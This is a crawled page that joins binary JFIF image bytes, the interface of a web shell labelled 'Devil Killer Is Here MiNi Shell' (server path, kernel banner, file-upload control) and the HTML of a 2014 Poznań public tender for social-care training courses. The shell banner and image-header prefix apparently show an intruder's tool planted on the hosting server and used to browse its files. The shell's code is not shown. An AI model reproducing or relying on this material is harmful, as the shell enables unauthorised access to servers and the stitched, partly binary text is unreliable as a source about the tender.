JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141010/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141010/214285-N-2014.html

<p class="kh_header"><b>Poznań: Część 1: Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Terapia zajęciowa dla dzieci z zaburzeniami zachowania

Część 2: Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Przeciwdziałanie przemocy w rodzinie</b><br>
<b>Numer ogłoszenia: 214285 - 2014; data zamieszczenia: 10.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej w Poznaniu , ul. Nowowiejskiego 11, 61-731 Poznań, woj. wielkopolskie, tel. 61 8567-300, faks 61 8515-635.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rops.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część 1: Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Terapia zajęciowa dla dzieci z zaburzeniami zachowania

Część 2: Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Przeciwdziałanie przemocy w rodzinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1: Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Terapia zajęciowa dla dzieci 
z zaburzeniami zachowania
Cel szkolenia: Celem szkolenia jest wyposażenie uczestników w kompetencje niezbędne do rozpoznawania przyczyn zaburzeń zachowania dzieci i młodzieży oraz do świadczenia skutecznej pomocy (poprzez doskonalenie swojego warsztatu pracy) w przezwyciężaniu trudności w ich funkcjonowaniu społecznym. 

Zakres tematyczny:
Wprowadzenie:
zdrowie psychiczne a zaburzenia zachowania u dzieci, 
źródła i mechanizmy zachowań niedostosowanych społecznie,
diagnoza zaburzeń zachowań dziecka w kontekście jego rodziny i otoczenia społecznego, 
z uwzględnieniem m.in. takich czynników jak postawy wobec autorytetu, relacje interpersonalne, rozwój kompetencji psychospołecznych. 
Terapia zajęciowa:
metodyka pracy z dzieckiem z zaburzeniami zachowania - zasady przygotowania i tworzenia scenariuszy zajęć warsztatowych oraz treningowych, indywidualnych i grupowych,
wykorzystanie metod aktywizujących w poszerzaniu warsztatu pracy terapeutycznej (pedagogika zabawy),
przykłady zajęć terapeutycznych np.: arteterapia, zajęcia relaksacyjne,
profilaktyka zaburzeń zachowania u dzieci.
Sposób organizacji szkolenia: Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić nie więcej niż 6 trzydniowych edycji szkoleń, w wymiarze 21 godzin dydaktycznych dla każdej edycji (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), dla 120 osób, w podziale na grupy (edycje) liczące maksymalnie 20 osób, wraz z zapewnieniem uczestnikom poszczególnych edycji dowozu, zakwaterowania oraz wyżywienia. 
Materiały szkoleniowe: Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 3 dni przed podpisaniem umowy. Materiały powinny być przekazane do akceptacji w wersji ostatecznej. Jeden komplet materiałów Wykonawca przekaże Zamawiającemu w momencie podpisania umowy. 
Rekrutacja i obsługa administracyjna: Współpraca z Zamawiającym w zakresie naboru kandydatów na szkolenie i tworzenie listy uczestników oznacza:
nawiązanie kontaktu Wykonawcy z jednostkami pomocy i integracji społecznej w Wielkopolsce 
i, na podstawie otrzymanych tą drogą zgłoszeń, przeprowadzenie wstępnej kwalifikacji uczestników szkolenia oraz sporządzenie listy kandydatów do grupy, 
przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia każdej edycji, 
poinformowanie kandydatów, po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, o zakwalifikowaniu się na szkolenie. 
Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego (baza e-mail jednostek pomocy i integracji społecznej w Wielkopolsce).
Zamawiający prowadzi działania wspierające działania Wykonawcy w formie ogłoszeń, listów oraz informacji na stronie internetowej. Mają one na celu promowanie szkolenia i informowanie 
o szkoleniu jednostek pomocy społecznej w Wielkopolsce.
Organizacja szkolenia
Dojazd: Wykonawca jest zobowiązany zorganizować dojazd uczestników na każdą edycję:
pierwszego dnia z miejsca zbiórki uczestników szkolenia do miejsca, w którym realizowane będzie szkolenie oraz po zakończeniu edycji powrót do miejsca zbiórki. Miejscem zbiórki uczestników szkolenia jest Dworzec Letni w Poznaniu, ul. Dworcowa 1.
Zakwaterowanie: Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników poszczególnych edycji w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno-szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym 
w woj. wielkopolskim, w tym w mieście Poznaniu. 
Sale szkoleniowe: Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki 
w oparciu o zasady BHP. 
Wyżywienie: Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom każdej edycji: 
pierwszego dnia - obiad dwudaniowy z napojem oraz kolację integracyjną,
drugiego dnia - śniadanie, obiad dwudaniowy z napojem, kolację,
trzeciego dnia - śniadanie, obiad dwudaniowy z napojem,
2 serwisy konferencyjne w każdym dniu szkolenia, składające się z kawy, herbaty, wody mineralnej, soków, owoców; np. jabłko lub banan, wyrobów cukierniczych.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 1.1. do SIWZ

Część 2: Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Przeciwdziałanie przemocy w rodzinie
Cel szkolenia: 
Celem szkolenia jest dostarczenie uczestnikom wiedzy i umiejętności z zakresu pomocy interwencyjnej, psychologicznej i terapeutycznej osobom uwikłanym w przemoc - ofiarom, świadkom i sprawcom przemocy w rodzinie.
Zakres tematyczny: 
Moduł I
Przemoc wobec dzieci: przyczyny, formy, czynniki ryzyka.
Specyfika rozwoju i zachowania dziecka doświadczającego przemocy w rodzinie. 
Konsekwencje doświadczania przemocy oraz bycia świadkiem przemocy w rodzinie dla rozwoju dziecka.
Wywiad z osobą wspierającą dziecko w rodzinie.
Wykorzystywanie seksualne dzieci.
Kazirodztwo.
Postępowanie wobec dziecka krzywdzonego/wykorzystywanego seksualnie.
Pomoc terapeutyczna dziecku krzywdzonemu i wykorzystywanemu seksualnie oraz jego rodzinie.
Moduł II
Wykorzystywanie superwizji jako metody doskonalącej warsztat pracy.
Charakterystyka sylwetki superwizora. 
Korzyści wynikające ze stosowania superwizji.
Warsztaty: superwizowanie własnych przypadków uczestników szkolenia.
Sposób organizacji szkolenia: 
Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić jedną edycję, 21-godzinnego szkolenia (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), dla 25 uczestników wraz z zapewnieniem uczestnikom dowozu, zakwaterowania oraz wyżywienia. Zajęcia będą prowadzone przez minimum jednego szkoleniowca.
Materiały szkoleniowe: 
Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 3 dni przed podpisaniem umowy. 
Rekrutacja i obsługa administracyjna: 
Wykonawca zobowiązany jest do współpracy z Zamawiającym w zakresie naboru kandydatów na szkolenie. Oznacza to: nawiązanie kontaktu Wykonawcy z osobami znajdującymi się na liście kandydatów przekazanej przez Zamawiającego, przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia każdej edycji szkolenia, poinformowanie kandydatów; po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, o zakwalifikowaniu się na szkolenie. Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego 
i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego.
Organizacja szkolenia
Dojazd: 
Miejscem zbiórki uczestników szkolenia jest Dworzec Letni w Poznaniu, ul. Dworcowa 1.
Wykonawca jest zobowiązany zorganizować dojazd uczestników na szkolenie: pierwszego dnia 
z miejsca zbiórki uczestników do miejsca, w którym realizowane będzie szkolenie oraz po zakończeniu powrót na Dworzec Letni w Poznaniu. 
Zakwaterowanie: 
Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników szkolenia w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno-szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym w woj. wielkopolskim, w tym w mieście Poznaniu. 
Sale szkoleniowe: 
Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. 
Wyżywienie: 
Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, 
a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom podczas szkolenia: 
pierwszego dnia - obiad dwudaniowy z napojem oraz kolację integracyjną, drugiego dnia - śniadanie, obiad dwudaniowy z napojem, kolację, trzeciego dnia - śniadanie, obiad dwudaniowy z napojem, 
2 serwisy konferencyjne w każdym dniu szkolenia, 
Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 1.2. do SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające dla każdej z części. 
Przedmiotem zamówienia jest świadczenie usług zorganizowania i przeprowadzenia szkoleń.
Zamówienie uzupełniające nie przekroczy więcej niż 50 % wartości zamówienia podstawowego 
i będzie polegać na powtórzeniu tego samego rodzaju zamówień.
Szczegółowy opis przedmiotu zamówienia zawarty jest dla Części 1 w Załączniku Nr 1.1. do SIWZ, dla Części 2 w Załączniku Nr 1.2. do SIWZ</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W zakresie Części 1 Zamawiający ustala wadium w wysokości:
3 300,00 zł ( słownie: trzy tysiące trzysta złotych 00/100)
 W zakresie Części 2 Zamawiający ustala wadium w wysokości: 
700,00 zł ( słownie: siedemset złotych 00/100) 
 Wadium wnosi się pod rygorem wykluczenia z postępowania przed upływem terminu składania ofert, w jednej lub kilku z niżej wymienionych form:
- w pieniądzu, przelewem na rachunek bankowy:
BGŻ S.A. OO Poznań
Rachunek nr 60 2030 0045 1110 0000 0234 9820
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
(Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz 
z 2010 r. Nr 96, poz. 620).
Jeżeli Wykonawca wnosi wadium w formie pieniężnej, wymagana kwota powinna znajdować się na rachunku zamawiającego przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w odniesieniu do warunku Wykonawca złoży oświadczenie 
o spełnianiu tych warunku (Załącznik Nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w odniesieniu do warunku  Wykonawca wykaże, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością, a w przypadku świadczeń okresowych lub ciągłych również wykonuje usługi polegające na przeprowadzeniu:
w zakresie Części 1:
- dwóch odrębnych szkoleń, tj. zrealizowanych na podstawie oddzielnych umów, minimum 20-godzinnych, w zakresie tematycznym dotyczącym terapii dzieci i młodzieży.
- dwóch odrębnych szkoleń, tj. zrealizowanych na podstawie oddzielnych umów, minimum dwudniowych wraz z zapewnieniem uczestnikom zakwaterowania i wyżywienia, każde o wartości co najmniej 50.000,00 złotych brutto.
Wykazane szkolenia mogą spełniać oba ww. warunki.
w zakresie Części 2:
- czterech odrębnych szkoleń, tj. zrealizowanych na podstawie oddzielnych umów, w wymiarze czasowym minimum 20 godzinne każde, w zakresie tematycznym dotyczącym przemocy w rodzinie,
- dwóch odrębnych szkoleń, tj. zrealizowanych na podstawie oddzielnych umów, minimum dwudniowych wraz z zapewnieniem uczestnikom zakwaterowania i wyżywienia, każde o wartości co najmniej 10 000,00 złotych brutto.
Wykazane szkolenia mogą spełniać oba ww. warunki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w odniesieniu do warunku  Wykonawca wykaże, iż dysponuje odpowiednim potencjałem technicznym w zakresie Części 1, Części 2:
- wykazem narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją 
o podstawie dysponowania tymi zasobami tj.: stroną internetową, adresem e-mail, sprawnym faksem, sprawnym telefonem.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w odniesieniu do warunku  Wykonawca wykaże, iż dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia wraz 
z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją 
o podstawie do dysponowania tymi osobami tj.:
w zakresie Części 1:
-  dysponuje trzyosobowym zespołem specjalistów, z których każdy posiada:
a)  wykształcenie wyższe magisterskie,
b) doświadczenie zawodowe w pracy z dziećmi i młodzieżą z zaburzeniami zachowania: minimum trzyletnie,
c) doświadczenie szkoleniowe: minimum 500 godzin dydaktycznych szkoleń o tematyce dotyczącej pracy z dzieckiem z zaburzeniami zachowania, zdobyte w okresie ostatnich 5 lat.
oraz
-  dysponuje co najmniej dwiema osobami, które:
a)  będą koordynować działania i obsługę w zakresie rekrutacji uczestników szkolenia, 
b)  będą sprawowały opiekę nad grupą w trakcie i na miejscu szkolenia,
c)  pozyskają i rzetelnie przygotują dokumentację projektową.
w zakresie Części 2:
- dysponuje jedną osobą, która posiada:
a) ukończone studia wyższe na jednym z kierunków: prawo, pedagogika, pedagogika specjalna, praca socjalna, psychologia, politologia, politologia i nauki społeczne, socjologia, polityka społeczna, nauki o rodzinie
lub ukończone studia wyższe na innych kierunkach uzupełnione studiami podyplomowymi w zakresie psychologii, organizacji pomocy społecznej*, pedagogiki, pedagogiki specjalnej lub resocjalizacji; 
* w przypadku studiów podyplomowych z organizacji pomocy społecznej równorzędnie traktowane są szkolenia z zakresu specjalizacji z organizacji pomocy społecznej. 
b) ukończone specjalistyczne szkolenia w wymiarze nie mniejszym niż 100 godzin dydaktycznych 
w zakresie przeciwdziałania przemocy w rodzinie lub co najmniej 5-letnie doświadczenie pracy 
w obszarze przeciwdziałania przemocy w rodzinie;
-  dysponuje co najmniej dwoma osobami, które:
a)  będą koordynować działania i obsługę w zakresie rekrutacji uczestników   szkolenia, 
b)  będą sprawowały opiekę nad grupą w trakcie i na miejscu szkolenia,
c)  pozyskają i rzetelnie przygotują dokumentację projektową</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w odniesieniu do warunku Wykonawca złoży oświadczenie 
o spełnianiu tych warunku (Załącznik Nr 3 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- wypełniony i podpisany przez Wykonawcę formularz ofertowy (formularz ofertowy - Załącznik Nr 2.1. do SIWZ dla Części 1, Załącznik Nr 2.2. do SIWZ dla Części 2)
- pełnomocnictwo do reprezentowania Wykonawcy, w przypadku podpisania oferty przez przedstawiciela Wykonawcy (w formie oryginału lub poświadczonej notarialnie kopii).
- wykaz Doświadczenie w przeprowadzaniu szkoleń i kwalifikacje kadry szkoleniowej
dla potrzeb oceny w ramach kryterium - Załącznik Nr 9.1. do SIWZ dla Części Nr 1, Załącznik Nr 9.2. do SIWZ dla Części Nr 2,
- dowody:
a) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, 
b) w przypadku zamówień na usługi - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, 
-pisemne zobowiązanie innego podmiotu podmiotów do udostępnienia osoby osób zdolnych do wykonania zamówienia lub zasobów niezbędnych do wykonania zamówienia, którymi Wykonawca będzie dysponował, lub inny dowód potwierdzający dysponowanie ww. osobami zasobami</p>

